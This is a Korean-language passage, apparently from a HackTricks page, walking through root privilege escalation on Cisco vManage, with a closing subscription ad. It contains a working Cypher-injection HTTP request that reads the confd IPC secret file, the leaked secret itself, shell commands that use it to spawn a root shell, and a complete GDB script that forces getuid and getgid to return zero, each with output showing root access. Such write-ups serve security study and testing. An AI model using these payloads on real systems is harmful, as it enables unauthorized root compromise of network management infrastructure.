confd와 다른 이진 파일에 대한 문서를 조금 파헤친 후 (Cisco 웹 사이트의 계정으로 액세스 가능), IPC 소켓을 인증하기 위해 /etc/confd/confd_ipc_secret에 위치한 비밀을 사용한다는 것을 발견했습니다.
vmanage:~$ ls -al /etc/confd/confd_ipc_secret
-rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret
우리의 Neo4j 인스턴스를 기억하시나요? 이는 vmanage 사용자의 권한으로 실행되고 있으므로, 이전 취약점을 이용하여 파일을 검색할 수 있습니다:
GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1
Host: vmanage-XXXXXX.viptela.net
[...]
"data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]}
confd_cli 프로그램은 명령 줄 인수를 지원하지 않지만 /usr/bin/confd_cli_user를 인수와 함께 호출합니다. 따라서 우리는 직접 /usr/bin/confd_cli_user를 우리 자신의 인수로 호출할 수 있습니다. 그러나 현재 권한으로는 읽을 수 없으므로 rootfs에서 가져와 scp를 사용하여 복사한 다음 도움말을 읽고 쉘을 얻기 위해 사용해야 합니다:
vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret
vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret
vManage:~$ /tmp/confd_cli_user -U 0 -G 0
Welcome to Viptela CLI
admin connected from 127.0.0.1 using console on vManage
vManage# vshell
vManage:~# id
uid=0(root) gid=0(root) groups=0(root)
나는 "confd_cli" 프로그램이 로그인한 사용자로부터 수집한 사용자 ID와 그룹 ID를 "cmdptywrapper" 애플리케이션에 전달한다고 가정했습니다.
첫 번째 시도로 "cmdptywrapper"를 직접 실행하고 -g 0 -u 0을 제공했지만 실패했습니다. 어딘가에서 파일 디스크립터 (-i 1015)가 생성된 것 같고, 이를 가짜로 만들 수 없습니다.
Synacktiv의 블로그에서 언급한 대로 confd_cli 프로그램은 명령 줄 인수를 지원하지 않지만, 디버거를 사용하여 영향을 줄 수 있으며 다행히 시스템에는 GDB가 포함되어 있습니다.
GDB 스크립트를 작성하여 API getuid와 getgid를 강제로 0을 반환하도록 했습니다. 이미 직렬화 RCE를 통해 "vmanage" 권한을 가지고 있으므로 /etc/confd/confd_ipc_secret를 직접 읽을 수 있는 권한이 있습니다.
root.gdb:
set environment USER=root
define root
finish
set $rax=0
continue
end
break getuid
commands
root
end
break getgid
commands
root
end
run
콘솔 출력:
vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli
GNU gdb (GDB) 8.0.1
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-poky-linux".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/confd_cli...(no debugging symbols found)...done.
Breakpoint 1 at 0x400f40
Breakpoint 2 at 0x401000Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401689 in ?? ()Breakpoint 2, getgid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401694 in ?? ()Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401871 in ?? ()
Welcome to Viptela CLI
root connected from 127.0.0.1 using console on vmanage
vmanage# vshell
bash-4.4# whoami ; id
root
uid=0(root) gid=0(root) groups=0(root)
bash-4.4#
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!
사이버 보안 회사에서 일하시나요? 회사를 HackTricks에서 광고하고 싶으신가요? 아니면 PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드하고 싶으신가요? SUBSCRIPTION PLANS를 확인해보세요!
